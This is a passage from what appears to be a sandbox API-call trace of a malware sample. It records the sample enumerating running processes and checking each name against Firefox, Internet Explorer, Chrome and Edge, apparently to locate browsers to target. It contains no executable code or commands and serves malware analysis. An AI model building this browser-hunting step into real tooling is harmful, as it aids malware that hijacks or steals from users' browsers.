(lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0239.945] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0239.945] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.945] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.945] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0239.945] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0239.945] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0239.945] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.945] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.946] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0239.946] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0239.946] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0239.946] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.946] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.946] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0239.946] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0239.946] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0239.946] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.946] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.947] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0239.947] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0239.947] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0239.947] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.947] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0239.947] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0239.947] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0239.947] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0239.947] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.947] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.948] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0239.948] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0239.948] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0239.948] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.948] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.948] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0239.948] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0239.949] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0239.949] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.949] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0239.949] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0239.949] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0239.949] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0239.949] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.949] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0239.950] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0239.950] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0239.950] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0239.950] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.950] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0239.950] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0239.950] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0239.950] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0239.950] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.950] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.951] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0239.951] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0239.951] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0239.951] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.951] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0239.951] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0239.951] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0239.951] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0239.951] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.951] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0239.952] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0239.952] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0239.952] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0239.952] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.952] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0239.953] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0239.953] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0239.953] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0239.953] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.953] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0239.953] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0239.953] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0239.953] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0239.953] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.953] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0239.954] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0239.954] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0239.954] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0239.954] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.954] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0239.954] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0239.954] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0239.954] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0239.954] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.954] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0239.955] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0239.955] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0239.955] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0239.955] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.955] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0239.956] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0239.956] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0239.956] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0239.956] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.956] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0239.956] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0239.956] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0239.956] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0239.956] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.956] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0239.957] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0239.957] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0239.957] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0239.957] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.957] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0239.957] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0239.957] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0239.957] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0239.957] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.957] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0239.958] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0239.958] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0239.958] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0239.958] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.958] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0239.958] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0239.958] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0239.958] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0239.958] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.958] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0239.959] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0239.959] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0239.959] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0239.959] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.959] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0239.959] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0239.959] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0239.960] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0239.960] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.960] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0239.960] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0239.960] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0239.960] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0239.960] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.960] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0239.961] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0239.961] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0239.961] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0239.961] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.961] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0239.961] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0239.961] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0239.961] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0239.961] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.961] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0239.962] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0239.962] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0239.962] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0239.962] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.962] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0239.965] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0239.965] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0239.965] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0239.965] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.965] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0239.966] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0239.966] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0239.966] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0239.966] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.966] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0239.966] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0239.966] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0239.966] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0239.966] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.966] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0239.967] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0239.967] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0239.967] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0239.967] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.967] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.967] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0239.967] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0239.967] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0239.967] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.967] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0239.968] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0239.968] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0239.968] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0239.968] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.968] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.969] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0239.969] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0239.969] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0239.969] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.969] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0239.969] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0239.969] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0239.969] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0239.969] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.969] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.970] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0239.970] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0239.970] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0239.970] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.970] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0239.970] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0239.970] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0239.970] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0239.970] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.970] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | 